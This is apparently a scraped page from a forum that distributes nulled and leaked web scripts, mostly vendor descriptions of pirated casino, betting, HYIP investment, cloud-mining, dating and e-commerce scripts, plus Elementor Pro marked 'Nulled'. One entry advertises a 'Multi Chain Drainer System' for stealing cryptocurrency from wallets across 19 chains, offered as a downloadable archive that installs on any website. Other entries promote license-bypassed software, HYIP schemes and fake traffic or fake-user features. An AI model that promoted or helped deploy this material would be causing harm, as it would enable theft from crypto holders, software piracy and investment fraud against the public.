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  1. Version v1.1 NULLED


    Kasino, a laravel made Online Gaming platform that enables a great opportunity to start your own Casino website. The casino is by far the most popular game and there were an estimated 2.8 billion gamers across the globe. According to the American Gaming Association (AGA), as of 2018, approximately 2,800 sites are active online and offer activities including bingo, poker, and lottery. Americans spent a total of $70.15 billion on only lottery tickets. we got Severals of requests to develop such items and we collect idea’s from some popular platforms. No need to pay thousands of dollars to hire developers to build your Casino Website. Kasino may assist you to handle unlimited users, winners, draws, transactions, able to accept payment via cards, cryptos, and mobile money. the ready-to-go solution, it takes only a few minutes to set up your website with our system. Kasino is a unique Casino platform. You can play real-time games whenever and wherever you like. The platform can be accessed not only from a PC but also from a full-service mobile. Its easily installable, controllable through the admin panel, comes with a responsive design, high security, interactive User interface. support plugins, LiveChat, Google ReCaptcha, analytics, automatic payment gateway, cards, currencies, and cryptos. we also here to provide you best support, installation, and customization if you need it. hurry up! get your copy and start your own Casino website. Zip Password:
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  2. 💯 Multi Chain Drainer System 💯 Drain on 19 different chains 🚀: ETH,OPTIMISM,CRONOS,BSC,GNOSIS,FUSE,HECO,POLY AND MORES !! Installation on any website files and documentation included 🔥 MultiDrainerV6.3.rar
    1 point
  3. View File Grupo Chat - Chat Room & Private Chat PHP Script Group Chat is a PHP Chat Room & Private Chat Script which includes a wide range of features. User Engagement is an important aspect in retaining users. By engaging your users you make sure that they are captivated and pay attention to your website, thus, preserving user loyalty. Enhance Your Website’s User Engagement with Grupo Chat Rooms. Features Grupo Chat offers a diverse range of features designed to enhance your chat experience. With unlimited chat room creation, one-on-one messaging, multilingual support, and customizable site and group roles, you have full control over your chat community. Additionally, image moderation tools, API requests, badge creation, audio player integration, and site advert placement contribute to a safe and engaging environment. Enjoy the convenience of push notifications, seamless WordPress integration, mobile-friendly design, and a profanity filter to ensure respectful conversations. With a landing page feature and responsive web design, Grupo Chat provides an all-encompassing chat solution with numerous additional features to explore. Self-Hosted Grupo Chat is Self-Hosted Chatroom Script. The main benefit of self-hosting is that you have complete control over your website data. Self-hosting gives you total control over your website. Easy Installation Our PHP Chat Script is integrated with easy Installer. Just provide your database details & Purchase Code, easy installer will do the rest for you. Groups/Rooms Create unlimited groups or chat rooms. Public Group Password Protected Group Secret/Hidden Group Unleavable Group Group Roles Restricted Group One to One Chat or Private Messaging Your users will love it because Grupo Chat Script allows them to chat one-on-one. When users can talk to one another, your product engagement is higher. User/Group Badges You can create any number of custom badges and assign manually these badges to users or groups. This will be shown on the group info & profile section. Badges helps to boost website users participation. Seamless Website Integration (Single Sign On) Grupo’s API facilitates single sign-on functionality, enabling users to seamlessly log in via your current website and access Grupo without the hassle of separate authentication. Video Chat Elevate your communication experience with video conversations for both group settings and one-on-one interactions, all powered by Agora and Twilio. Whether you’re looking to enhance your team collaboration, connect with clients, or host virtual events, our script has you covered Paid Memberships (Requires Extended License) Monetize Your Chat App with Ease. Transform your chat website into a money-making machine with Paid Memberships. With Paid Memberships, customize your chat environment and charge users for premium access. Cloud Storage Say goodbye to the limitations of traditional hosting servers and embrace the future of web hosting with our Cloud Storage feature. Now, you can store and load your website files directly from Amazon S3 or Amazon S3-compatible storage platforms like Wasabi and Backblaze. Link Filter Block users from posting URLs that you’ve identified as undesirable or potentially harmful. Say goodbye to spam, malicious links, and inappropriate content, and keep your online community safe and focused on meaningful discussions. Site Roles Site Roles Module allows you to enable or disable site user features and permissions. Just select/deselect the check boxes of capabilities you wish to add/remove to the selected role and click “Update” button to save your changes. You can even create custom site roles. Group Roles Group Roles Module allows you to enable or disable group member features and permissions. Just select/deselect the check boxes of capabilities you wish to add/remove to the selected group role and click “Update” button to save your changes. You can even create custom group roles. Dark Mode & Light Mode Mode Switcher allows you to change the color theme of Grupo from white to black or black to white. The darker tones are more relaxing for user’s eyes to take in, especially in low light, and don’t draw as much power as brighter colors. Facebook Like Reactions This let Users to react to user messages. Let your website users engage by giving them the opportunity to react user messages. WordPress Integration Looking for a way to integrate your WordPress website with Grupo? No worries! We’ve got you covered with our WordPress plugin. Connect your website and Grupo in a wave of a wand Friends Feature With the friends extension you can increase user interaction on your site by allowing users to become friends by sending & accepting/rejecting friend requests People Nearby Feature Allows people on a your website to search for other users within a certain distance relative to their own location. Fake Online Users Allows you to display a fake amount of users online on your Grupo site. This option allows you to choose the site users you want to show as online. Email Validators Provide an option to block email addresses from certain domains or allow email addresses only from certain domains. Helps you to eliminate disposable, fake email addresses. Language Manager(Multi-Language Support) Grupo allows you to create easily a multilingual website, without having to install any third party extension. Translate your site in multiple languages in the easiest way. Image Moderation Auto Remove Images that contain Partial Nudity, Explicit Nudity, Weapons, Alcohol, Drugs, Offensive Signs, Graphic Violence & Gore. Push Notifications Web push notifications are notifications that can be sent to a user even if the user is offline. These are alert style messages that slide in at the top or bottom right hand corner of a desktop screen, depending on the operating system; or appear on a mobile device in a manner nearly identical to push notifications delivered from apps. Web Push notifications are sent : When a user sends a Private Message to an another user (offline) When a user mentions another user in Group Chat When a user replies to the another user messages (Group Chat) Progressive Web App Progressive Web Apps provide an installable, app-like experience on desktop and mobile that are built and delivered directly via the web. Progressive Web Apps (PWAs) are web applications that are regular web pages or websites, but can appear to the user like traditional applications or native mobile applications. The application type attempts to combine features offered by most modern browsers with the benefits of a mobile experience. Message Scheduler Allows you to schedule a message to be sent at a specific time in the future. With this feature, you can compose a message, select the desired date and time, and the message will be automatically sent at the specified time. Mobile Number Verification via OTP Mobile Number Verification via OTP is a secure way to ensure that a user’s mobile number is valid. This method can help prevent fraudulent activities, such as creating fake accounts. Adblock Detector An Adblock Detector is a feature that detects whether a user is running ad-blocking software or extensions in their web browser. It is designed to detect when a user is blocking ads on a website and prompt them to disable their ad-blocker or whitelist the website. IP Intelligence IP Intelligence is a service that determines how likely an IP address is a proxy / VPN / bad IP using advanced mathematical and modern computing techniques. Ad Slots Ad slots helps you to place advertisements or html content in Grupo. Stickers This feature allows users to send different stickers while chatting just like other instant messaging apps. You can add or manage stickers via Grupo Panel. Social Login Social Login is single sign-on for end users. Using existing login information from a social network provider like Facebook, Twitter, or Google, the user can sign into a Grupo Chat instead of creating a new account. This simplifies registrations and logins for end users. Grupo Chat is integrated with more than 40 providers. Audio Player This feature helps to let your users to start listening to the radio/playlist you’ve added for them. To add radio stations, you just need to add their stream links. Language Manager(Multi-Language Support) Grupo allows you to create easily a multilingual website, without having to install any third party extension. Translate your site in multiple languages in the easiest way. Support RTL languages Grupo supports RTL languages (Arabic,Hebrew,Persian,etc) and keeps the same layout and HTML structure as the original version of your website in the translated versions. File Previews Preview image files and videos right in your browser, without having to download the files and then open them in a different application! Link Previews Link previews are generated by fetching the URL and parsing meta tags of the page for title and description and image tags for thumbnails. Voice Messaging Sometimes we are too tired to text type messages, that’s the time we can send voice messages by recording our texts. Grupo allows to send voice messages to individual or group chat. Auto Group Join Auto-Join Group feature allows you to automatically join new Grupo members to Group(s) of your choice. Pin Group A pinned group is a group that you manually select to stay at the top of the Group list, meaning it will not slip down the list as you continue to add other groups. Guest Login Alllows non members to login & join online chat rooms without account registration. Send Tenor GIFs Search and share the best and most popular animated GIFs to group or individual conversations. File Storage Lets the Grupo site users to upload files. Each file is saved in private directory so each user can download/delete/share their own files after login. Flood Control When one chat user sends too many messages at one time, either in group chat or in private message, Flooding occurs. Grupo has a Flood Control feature that automatically ignores a user when flooding occurs & prevents users from spamming the chat. Profanity Filter A swear filter, also known as a profanity filter is a subsystem which modifies text to remove words deemed offensive by the administrator. Login as User Allows admins to have easy access to the frontend as a specific user instantly to check data. With one click, the admin logs in as the external user and handles any situation without wasting any time at all. Block IP Addresses If you have annoying visitors or spammers, you may find it useful to block these users from accessing your website content. You can block bad visitors by IP address or blocks of IP addresses. You can choose to block a range of IP addresses as well as blocking individual IP addresses. User Profile User Profile is a component that allows you to profile users by using custom fields & show user informations, Group Info This allows you to see group’s informations & custom fields in the Group Info Screen Avatars Grupo comes with 50+ built in avatars. Users can choose a avatar of their choice. User mentions User mentions are a great way to include other users within your messages, and ensure that they know about your mention. Mentions work similarly to how they work on Twitter, where you use an ”@” symbol, and then someone’s username. Bulk File Uploads Alow users to you to multiple files at once. Export Conversations Users can easily export a particular conversation via Export Chat option Group Invitation Users can invite people to join groups using their email address or usernames. Play YouTube, Dailymotion, Vimeo videos Allow users to play YouTube, Dailymotion, Vimeo videos within the chat screen Deny direct access to user uploaded files Grupo protects from executing user uploaded php files as well as prevent Google, other search engines and unwanted users from indexing and stealing user files. Typing Indicator When someone is writing to you, the Typing Indicator will appear. Allows your users to see when an someone is typing a reply back in an conversation. Prevent User Registrations User Registrations can easily be disabled in Grupo, and without modifying any source code. Emoji Picker Users can insert emojis in their messages. Include more than 2,000 emojis. Gravatars Gravatar stands for Globally Recognized Avatar. It is globally recognized because millions of people and websites use them. Most popular applications like WordPress have built-in support for Gravatar. Grupo supports Gravatar, it pulls users Globally Recognized Avatar from Gravatar servers. Custom Fields (Group/Profile) You can create custom profile or group fields. Short Text Long Text Date Field Number Field Drop Down Field Ban User Accounts Allows admins to blocks user accounts and prevents users from accessing the chatroom or website. Long Polling As in regular polling, rather than having to repeat this process multiple times for every client until new data for a given client becomes available, Long polling is technique where the server elects to hold a client connection open for as long as possible, delivering a response only after data becomes available or timeout threshold has been reached. After receiving response client immediately sends the next request. Cache System The Cache System creates static files and stores them on the servers disk. The web server will deliver the static file and avoids the resource intensive backend processes. User Device Logs User Device Log is a simple module that logs the IP address & device information of users on login event to table. Quoted Replies Instead of hopping into a conversation and replying to a message that was sent earlier in the day without any context, a quoted reply makes it clear what you are talking about. As you can imagine, this will surely come in handy in a group conversation. Limit Excerpt Length (Read More) Filters the maximum number of characters in a message excerpt. Default length is 300 Characters. Use this filter if you want to change the default excerpt length. Responsive Web design Responsive web design (RWD) is an approach to web design that makes Grupo render well on a variety of devices and window or screen sizes. Add Menu Items You can easily add or manage menu items from an easy to use interface inside your Grupo admin area. Customizer Allows you to easily customize Grupo (background,text-color,font-size) straight from Grupo Customizer. Read receipts Read receipts is the way by which the sender can tell or get to know whether the message is read by the receiver or not. Headers and Footers Lets you insert code like Google Analytics, custom CSS, Facebook Pixel, and more to your Grupo site header and footer. No need to edit any core files. Complaints/Spam reporting Complaints are reports made by users against messages/groups which they believe is spam or abuse. Profile Deactivation Users can deactivate their account temporarily and choose to come back whenever they want. Limit Login Attempts Limit the number of retry attempts when logging in (per each IP). This protect your site from brute force attacks. Role Color Role Color lets you to set a custom color for each Site Role. Boxed or Full Width Layout There are 2 layout types available in Grupo, Boxed & Full Width Layout. You can switch between these layouts with Grupo Customizer. Character Limit Admin can set a minimum or maximum length of text message that users can send. Grupo Cron Jobs Grupo Cron Jobs allows you to create time-based tasks in Grupo Grupo core includes features such as auto delete messages, auto delete users, etc. Drag and Drop File Uploading Allowing users for drag and drop file upload alongside the traditional file input. Custom Background Allows your users to set their own custom background image for their page. It allows them to upload a new image and sets it as their background image. Invite Non Members to Group Chat Users can invite non site members to join groups using their email address. Block Posting URLs You can block users from sharing URLs. Invite using Group Links Users can invite others to their groups by sharing a special link with them. Send Screenshots Users can easily share your screenshots with other people. Pressing PRINT SCREEN captures an image of your entire screen and copies it to the Clipboard in your computer’s memory. You can then share (CTRL+V) your screenshots with other people in a conversation. Hide languages Admins can hide languages. Go to languages & select language that you would like to hide. Alerts or Notifications Alerts are used when the system wants to notify the user about some status or other event. Limit Records per load Admins can specify the number of records to return on loading list or messages. Infinite Scrolling Infinite scrolling is a web-design technique that loads content continuously as the user scrolls down the page, eliminating the need for pagination. Custom CSS Custom CSS is part of the Customizer which allows to add any Custom CSS code to your website without any hassles. Embed Group Chat Embed your chat or group on your website or blog via an iframe with just a few lines of code. Grupo Booster Our Booster speed up your Grupo performance by using Cache, CSS, JavaScript, etc. Auto-rotate pictures Ever wonder why some photos look correct in some programs, but appear sideways or upside down in others? This feature read Exif data labeled Orientation and automatically rotates the image to the proper orientation Email Verification This feature verifies the email address of user by sending the verification link to the email of a user at registration time. Profile Cover Photo Users can set an image as their profile cover. A cover photo is the larger photo at the top of your profile, right above your profile picture. Group Cover Photo Admins can set an image as their group cover. A cover photo is the larger photo at the top of Group info, right above group picture. Multiple Time zones Users can set their own time zone for their user account and have their local time zone display throughout Grupo. Login Session Lifetime Admin can specifies the number of days after which login session data will be seen as garbage and potentially cleaned up. Automatic Time-Zone Detection Detect and set the user time zone automatically. Multiple Notification Sounds Contains 10+ Notification Sounds. Users can set the notifications sound of their choice. Alert in Title Bar (New Message) Puts a blinking title on title bar to notify a user that he/she received a new message. CAPTCHA CAPTCHA is a provider of human verification systems which helps to protect your website against abuse and brute-force attacks. Google Analytics Just provide your Google Analytics ID & Grupo will automatically generate & add your Google Analytics Tracking Code to your site. Font Picker You can set a font of your choice from more than ten inbuilt fonts. Welcome Screen You can customize the welcome screen image & text to meet your own branding requirements Custom Pages You can create your own Custom Pages Go Offline If users want to log into Grupo and not worry that others will see you and try to chat, they can easily change their “online status” so they appear offline. GDPR Cookie Consent A simple way to get GDPR Cookie Consent as per EU GDPR/Cookie Law regulations & lets visitors know that the site is using cookies. Multiple Logins Keeps users logged into your website securely on multiple devices. 24 & 12 Hour Clock Format Admins can change the time format from 12 hour to 24 hour format & vice versa & Many more features & more to Come Submitter Mahmoud Submitted 09/26/2023 Category Scripts Demo https://codecanyon.net/item/grupo-pro-chat-room-script/25263116
    1 point
  4. Pro Advanced Bot Traffic v2020 – Promote your website/business, according to your targeted keywords. 1st place in Google! Demo: https://codecanyon.net/item/pro-advanced-bot-traffic/21300658 Download: doniaweb.com_pro-advanced-bot-traffic.zip
    1 point
  5. 1 point
  6. View File CyberMiner - Cloud Mining Script Unlimited License Features ------------ -- Instant Deposits and Withdrawals – Compatible with all supported coins on Block.io/CoinGate/Coinpayments/GoURL/FaucetPay/PayKassa/CryptApi/SendBit – Affiliate Program with fixed percentage -- Users can buy mining power -- Automatic mining power deactivation -- Reinvest option -- Latest deposits, withdrawals and User Activities -- Referrals List with hits counter -- Profit Calculator -- GDPR Banner Admin Panel ----------------- Homepage with important information blocks Users => List, Search, Delete, Edit, Impersonate Admins => List, Search, Create, Edit, Delete, Impersonate Roles => List, Create, Edit, Delete Permissions => List, Create, Edit, Delete Deposits => List, Search, Edit, Delete Withdraws => List, Search, Edit, Delete Withdraw Requests => List, Search, Edit, Pay News => List, Edit, Delete, Create Pages => List, Edit, Delete, Create Faqs => List, Edit, Delete, Create Tickets => List, reply, delete Ticket Status => List, Edit, Delete, Create Ticket Priorities => List, Edit, Delete, Create Ticket Categories => List, Edit, Delete, Create Error Logs => List, View, Delete Settings => Edit site settings Update Script Dark-Light Mode Payment Methods ---------------------------- Deposits - Coinpayments, Coingate, FaucetPay, PayKassa, GoURL, CryptApi, SendBit Withdrawals - Coinpayments, Block.io, FaucetPay, PayKassa Other Features -------------------- 100% open source Installation Wizard Site Demo Admin Demo Instructions: Admin User: demo Admin Pass: 123456 Requirements ------------------- Server Type: Linux PHP version: 7.4 MySQL version: 5.7.14 or higher PHP extensions: OpenSSL PHP, PDO, Mbstring, Tokenizer, XML, CURL, BCmath, Ctype, GMP(Block.io integration), IoncubeLoader Apache Extensions: Mod-Rewrite Submitter Mahmoud Submitted 10/31/2022 Category Scripts Demo https://cyberminer.smartyscripts.com/
    1 point
  7. This means that there is a missing step. I remember that approximately in the .env file on line 9 you should write the word DoniaWeB. Do that and try again.
    1 point
  8. This Digital Lottery Ticket application provides a digital platform supporting Raffler, where users can participate in assorted contests with awaiting big rewards. How it works Digital Raffler automatically start according to a schedule specified by an administrator. Each user can participate in the Raffler contest by purchasing Raffler tickets. A random ticket will be drawn at the end of the contest. The ticket owner will win the prize, which represents a prizepool (set by an administrator) of all purchased tickets value. All lottery Contest start automatically without human intervention. Demo: https://codecanyon.net/item/megalotto-digital-lottery-app/29935659 Download:
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  9. Version 1.2


    LaraBuild is a laravel package for developers. It comes with Settings Builder and Drag and Drop Page builder. It saves you months to develop settings and pages in a few steps. It is designed to help the developers to link with their laravel project and design the options very quickly rather than writing a bunch of code. It comes with 16+ field types Options/Settings Builder Settings builder will allow you to create your project settings by defining the arrays. It has a bunch of field types to create any type of settings
    1 point
  10. View File Pixer - React Laravel Ecommerce Multivendor Digital Marketplace Pixer – React Laravel Multivendor is a digital eCommerce Marketplace script implemented based on Laravel, React, Next JS, and Tailwind CSS. It is one of the fastest and most secure digital assets selling E-commerce app. It’s very easy to use, we have used axios and react-query for data fetching. You can set up your API endpoints very easily and your frontend team will love using it. It has REST API support. On the frontend, we have used React, NextJS [ TypeScript ] & Tailwind, and Laravel for the backend. Full source code is available. It’s very easy to install and deploy. It will help you to grow your business fast as it’s a very easy digital e-commerce solution. We have added good documentation, tutorials and we tried to make everything extendable and reusable so you can edit as your own need. It has full admin support too to maintain and manage your order. You will get full source code, Frontend, and Backend. It has Multivendor support. The script has both dark mode and light mode for the shop version that will blow away your user experience. Submitter Mahmoud Submitted 02/28/2023 Category Scripts Demo https://codecanyon.net/item/pixer-react-laravel-multivendor-digital-marketplace/36383345
    1 point
  11. Wovie is a powerful, flexible and User friendly Movie and TV Series Steaming CMS Pro with advance video contents management system. Features Easy Installation : Install Wovie easily with no coding or developer in a few steps with our easy to use installer and documentation Source Code : We don’t encrypt or hide our code. You have the freedom to integrate and change our code to make it fit your needs. Ads Manager : Paste ad codes into integrated ad slots in admin panel and will be displayed automatically. Multi Languages : You can translate Wovie to any language by editing only one file. SEO Friendly : SEO friendly links, and HTML code that Google will love ❤️ Social Sharing : Drive Traffic to Your Website Through Social Media Community : Keep members interacting with each other with Comments and Discussions High Performance : The system that meets 100% of Google Lighthouse requests Player : Mp4, TS,m3e8 video format support. Wovie came with a range of features such as: TMDb Import of movies and shows. Onesignal API for notifying subscribed members. Comment system. A forums section. Advertisement manager and advertisement slots. But we've come together and added a boat load of fixes and features which can be found below! Chatbox for requests and general chit chat. PWA Support which works on Android and iOS for those none native apps. Better SEO Support. More customisations. Sitemap generation for Google Search Console. RSS Feeds for your users to subscribe to. Maintenance mode for if you need to do some secret work. Auto embed support using Remote Stream* THIS SCRIPTS MAIN FOCUS IS NOT AUTO EMBEDDING DON'T EXPECT IT TO HAVE EVERY MOVIE. And Tons of bug fixes! Example websites: https://watcha.movie Demo: https://www.codester.com/items/28926/wovie-movie-and-tv-series-streaming-platform Download:
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  12. View File Script system betting site V1 There is no support for this free leaked script, No one is obliged to install it for you, avoid being a boring person. HOW TO INSTALL? Upload the project to the /public_html Upload the MYSQL database Configure the .env file with your website URL and database connection. From CHMOD 777 in the /public folder configure agent and API token Demo: PASS:
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    Submitter Souz x17 Submitted 01/23/2024 Category Scripts Demo
    1 point
  13. Script Link : https://codecanyon.net/item/foodappi-pwa-food-delivery-system-and-whatsapp-menu-ordering-with-admin-panel-restaurant-pos/51692522 Hello there i'm here to request a script. please if anyone have this script comment below.
    1 point
  14. Version v4.0


    Turn your UltimatePOS Advance application into SaaS application and start selling subscriptions to be profitable. No Coding Required Before you Purchase: Note that this is not a Standalone application, it is an “Optional” extension to UltimatePOS Advance UltimatePOS Advance is one in All Software with: Stock or Inventory Management POS (Point Of Sale) Service & Invoicing It can be used for All Services Fashion & Clothing Departmental Stores Medical Footwear, Liquor shops, Sanitary & Hardware Salon & Spa Home Appliances & Digital Restaurants & many more … Features in SaaS & Superadmin module: Packages: Create Unlimited subscription packages Activate, Deactivate or Delete Packages Trial Days Free Packages Daily / Monthly / Yearly Interval selection Limit number of locations, active users, Products, Invoices Private packages (can only be seen by superadmin and superadmin can only assign that to businesses) One time package (Package which can be subscribed only once) Modules enable with package Manage Businesses: Add, View, Deactivate or delete businesses. View business subscription logs Assign package to business Approve, Waiting or Decline subscriptions Filter business by there last transaction date Payment Gateways: Stripe Paypal Razorpay (Indian payment gateway) Pesapal (Kenya payment gateway) PayStack (For NGN Nigeria, GHS Ghana) Flutterwave Offline payment Super Admin Settings: Manage different settings directly from interface Application settings Payment gateway related settings Backup: Local or Dropbox Pusher settings Custom or Additional Javascript, CSS Register terms & conditions Emails: New business welcome emails Package subscription confirmation email Package expiry email Communicator to send message to all or selected businesses Intuitive dashboard to give details of your businesses. One Click installation Complete setup guide. Subscriptions alert on expiry.
    1 point
  15. Version 3.6


    What to expect from BookingDo SaaS – Multi Business Appointment, Service Booking SaaS BookingDo SaaS – offers 2 dashboards, both for the back and front end. It helps in the easy understanding of useful information Easy to manage storefront by listing services and service categories Ease in creating tax and assigning rates to them Multi 10 themes with dynamic different color options BookingDo SaaS – offers a complete booking summary of any given booking The store view on the front end allows the users to enjoy their shopping process Full White Label Store Setting Payment gateways for secured payments Whatsapp Integration Telegram Integration Email booking notification to vendor A user-friendly RTL experience for customers using Arabic, Hebrew, and Urdu-like languages Any of the plans payments can be done using 9 diverse payment gateways namely (COD, Razorpay, Stripe, Paystack, Flutterwave, Paypal, Marcadopago, My Fatoorah, ToyyibPay, PayTabs, Bank Transfer) Built with Laravel 9
    1 point
  16. Elementor Pro Nulled is a revolutionary WordPress page builder ever. This is the most Advanced, Modern and Easy-to-use page builder for designing and building modern WordPress website. The Nulled Elementor Pro WordPress Plugin is the best front-end drag & drops page builder. You can now create stunning websites with pixel-perfect results at lightning fast speeds. Name: Elementor Pro Version: v3.14.1 Pro [LATEST] Platform: WordPress Language: English Demo Elementor Pro WordPress Plugin DEMO PRO Elementor Nulled includes 300+ premade, beautifully crafted templates as well as 90+ widgets that can be used on any landing page. The Elementor Pro Nulled WordPress plugin offers advanced capabilities and features that create beautiful page designs like you’ve never seen on WordPress. It’s easy to create any kind of website with the Elementor plugin. The PRO package also includes options for the Popup Builder, Theme Builder, and WooCommerce Builder. Elementor allows you to switch to responsive editing mode. This will allow you to edit any element on any device. You can also download Elementor PRO Nulled free of charge and build your website in just a few clicks.
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    1 point
  17. Please, update: Active eCommerce CMS + Addons And Apps v8.9 and Addons NULLED Offline Payment 1.6 e outhers.
    1 point
  18. View File MarioFast (MarioPay) Casino Script - RETRO BETGAME Well let's go, this is my second file. Mario is a game that revolutionized the world, so this Mario Cash script was released... The game involves betting, you must select a value and start collecting coins, ending the bet if there is time. In the same style as Subway, this fever is lost across the network in diverse scripts Few bugs have been reported but can be easily fixed. I've only registered 1 so far You can evaluate yourself in the Demo. .Sql in the file and conexao.php (to install) works in hosting as well as subway installation is identical. You can modify it if you see the need, I await the new versions... Submitter Roberto Maka Submitted 05/22/2024 Category Scripts Demo https://www.pixmania.website/mario/  
    1 point
  19. View File QuickDate v1.7 - The Ultimate PHP Dating Platform QuickDate is a dating social script, QuickDate is the best way to start your own dating website! QuickDate is fast, secured, and it will be regularly updated. Check out the Demo https://quickdatescript.com/ User Features Upload Images: Upload any image from your device and share it online with other users High Performance & Capability: PixelPhoto can handle any amount of vidoes / images easily, with a very high performance and speed. WoWonder Integration: With one click, user can login to your site using WoWonder Social Network. Like: User can like users in find match page. User Profile: User can create his own profile and upload unlimted images. SEO friendly: SEO friendly links, and HTML code that Google will love! Powerful Admin panel: Manage settings, videos, design, and a lot more easily from our admin panel. Powerful UI: Beautiful and modern design. Pro System: User can get top features by subscribing to one of the script pro packages. Credit System: User should purchase credit to use it on messages, gifts, likes. etc and much more… Submitter Mahmoud Submitted 04/18/19 Category Scripts Demo https://codecanyon.net/item/quickdate-the-ultimate-php-dating-platform/23268605
    1 point
  20. Turkish wordpress series theme. Features Compatible with All Devices (Responsive) 100% Seo Compatible Coding Manage Site Settings with DiziPlus Panel! Simple and Stylish Design Ajax Membership System Ajax Array Search and Advanced Filtering Custom Fields, Components, and Menus Episode “Watch Later” and “I Watched” Feature Add Series to Favorites Feature Demo: https://demo.fcsthemes.com/diziplus/ Download:
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    1 point
  21. Smart Hospital is Modern and Complete Hospital Automation Software that suites to almost every hospital or medical institution from patient OPD visits to Operation to Pathology Test etc. It includes 25+ modules with 9 inbuilt users (Super Admin, Admin, Doctor, Accountant, Pathologist, Radiologist, Nurse, Receptionist and Patient) panel. Demo: https://codecanyon.net/item/smart-hospital-hospital-management-system/23205038 Congratulations, it doesn't need a license Download:
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    1 point
  22. PTCLot is a pay per click (PTC) earning platform. where customers can earn from clicks on the ads and referral bonuses. The site owner can earn from the subscription plan and the admin can create unlimited ads for the customers. The script has 12+ payment getaways and unlimited offline payment getaways. PTCLot included 2 click site installer to install the script without any technical knowledge Demo: https://codecanyon.net/item/ptclot-ultimate-pay-per-click-earning-solution/38248491 Download:
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  23. Version v3.8 NULLED


    A to Z SEO Tools v3 is a Search Engine Optimization Tools. We have more than 50 SEO Tools to keep track your SEO issues and help to improve the visibility of a website in search engines. It also helps to optimize web content by analyzing content for keywords, on-site links and other SEO considerations. Main Features: - User Management System - Oauth Login System Included (Twitter, Facebook and Google ) - Fully translatable to any language - Track your visitors traffic and input queries - Fully SEO-friendly URLs - Captcha protection system for SEO Tools - One-Click Ads integration - Powerful admin control panel - Easy Maintenance Mode - Google analytics support - Responsive design - Inbuilt Sitemap Generator - Advance Mailer for Account Activation, Password reset etc.. - Support both SMTP and Native PHP mail - Contact page for visitors to contact you easily - Create unlimited custom pages - Add-ons Support - Support Theme customization / Custom coded themes - Two Simple Themes included on the Package! - Inbuilt Easy Installer Panel
    1 point
  24. Version v15.0.0 NULLED


    LaraClassifier is the most powerful Classified Ads Web Application in the market. An Open Source and modulable classified app having a fully responsive design. It is packed with lots of features. Features Custom Fields (Create your own Classified Ads, Auto Deals Classified, Real Estate Classified, Directory Listings or Jobs Portal websites) Based on a REST API (RESTful API) Clean and Modern Design Fully Responsive (also in Admin panel) Built with PHP/MySQL & HTML5/CSS3 Frameworks: Laravel, Bootstrap, jQuery, VueJS Geo location supported (with Maxmind free or pro database) Multi Currencies Support for RTL direction Multiple Languages Available Unlimited Colors Homepage Customization (Change and Order the Home Sections from the Admin panel) Users, Roles and Permissions System (ACL) integrated in the Admin panel PayPal Integrated Google Adsense integrated Google Maps integrated Twilio and Nexmo APIs integration Facebook comment integrated ReCaptcha integrated Turn ON/OFF Ads activation Option Turn ON/OFF User account activation Option Allow guests to post an ad without being logged Email Notifications (Using local SMTP or Amazon SES, Mailgun, Mandrill, or Sparkpost API) SMS Notifications (Using Twilio or Nexmo API) Resend Mail or SMS verification feature (Get more users with valid email or phone number) Messaging System between Sellers & Buyers integrated (NOTE: Only Buyers can start the conversation) CMS for Static pages (Create pages like: About Us, FAQ, Terms & Privacy, etc.) Contact page (Contact form & Google maps) Website Sitemap page Google XML Sitemap RSS feeds generator List of countries page (If activated, SEO supported) SEO optimized WebP image format support Website backup (Admin panel module) Blacklist (Admin panel module) Plans/Packages (for Premium Ads) Front End Listing Submission Social Networks Login (Facebook, Google) Protecting the users phone number against crawler Well commented code. Ready to use Easy to use. Only 2 minutes to install it. and much more..
    1 point
    Please can you post the latest update(version 2.0) for this script
    1 point
  25. I get this error during installation, both the automatic install and the manual isn't working
    1 point
  26. Version 3.1 NULLED


    Genius HYIP is a complete solution and automated HYIP investment script for an Online Investment Platform. Genius HYIP is created for the business owner who wants to start and promote their business in the Online Investment arena. Its an undoubtedly the largest Investment script with huge advanced and standard features. Users can register themself free and they can invest in different plans. According to the plan, users will get bonuses from the system after investment. Genius HYIP comes with the features like Withdraw, Deposit, Investment Plans, Bonus, Referral Commission, Money Transfer, Request for Money Transfer, Send Request money, 2FA, etc. Also, the User will appropriately get all the transaction details. Admin will get profit from the Money Transfer as well as from the withdrawal percentage. Everything is dynamic and can be set up from the admin panel. It has a strong SQL injection protection system which will keep away this system from hackers. This script is perfectly created with lots of known online payment gateways to make the payment easier, flexible, and comfortable. Genius HYIP is easily installable and you can manage this script more easily with user-friendly features and an interactive interface with a fully responsive design. It’s designed for everyone, whether is the user technical or non-technical. Anyone can interact with the interface easily and comfortably. The Genius HYIP will make you Successful for sure in the Online Investment Business arena as well as it will save your Marketing cost also for this one you don’t need any Coding Skills. Genius HYIP may assist you to handle unlimited users, and investments, accept a good number of payment gateways, cryptos, Supports Multiple Language, and Multiple Currency. You can easily manage which currency will be accepted or not, Also you can set the system base currency. If you are looking for the Best HYIP investment script which will grow your business to the next level then Genius HYIP will be the right choice for you. It takes only a few minutes to set up your website with our system. So, Let’s Start Your Investment Platform with Genius HYIP. User Features Smart Dashboard Statistics Dark Mode Facility User Registration System Multiple Language System Multiple Currency Opportunity Advanced Transaction Sorting and Searching All the Transactions with Details Investment Opportunity Investment History Sorting with Detail Information Able to transfer Money and Transfer History Send Request Money and Request History Receive Request Money and History Advance Deposit System Previous Deposit Management Standard Withdrawal System Withdrawal History with Smart Sorting System Referral URL Generate. Referred Users Informations Referral Commission Log Support Ticket Opportunity Able to Edit Own Profile 2 Factor Authentication Security Password Changing and Recovery System And much more..
    1 point
  27. View File Refer and Earn PHP Script Start your own Affiliate Business where user will refers other users and activate memberships. User will buy different memberships and earn referral commission of the stage setted from admin panel. Deluxe Script Providing you full support, customization service as you needed Key Features Included Multi Language Supported. Membership System Email Notifications. High Security Includes (2 Factor Auth & Google Auth) Multiple Automatic Deposit Methods Includes ( Stripe, PayPal, Skrill, AdvCash, Perfect Money, Payeer, Bank Transfer) Multiple Withdrawal Methods ( You can add any withdraw method) Manual Deposit System. Wallet Passphrase System. (Helps to Secure Account) Referral System Google Auth on Send Money & Withdrawal Fund All Transaction History User Friendly SEO & Friendly URL Site Map Included txt Included Mobile Based / Bootstrap Responsive Design Google reCaptcha Supported Login Logs For Users Document Verification System (KYC) Change Email Templates Easily (HTML/CSS) Change Currency Easily And much more….. Try our demo Back-end features Well Maintained Admin Panel Easy Manageable Dashboard Easily Manage Users. Dispute Management System Manage Different Languages Deposit Method Manual and Auto Both Withdrawal Method Auto Fraud Detection Transaction History Manage Send Money Manage Request Money KYC Verification Setup Mail Server Setting Admin Management And much more… Check out our demo Supported Payment Gateways PayPal Skrill 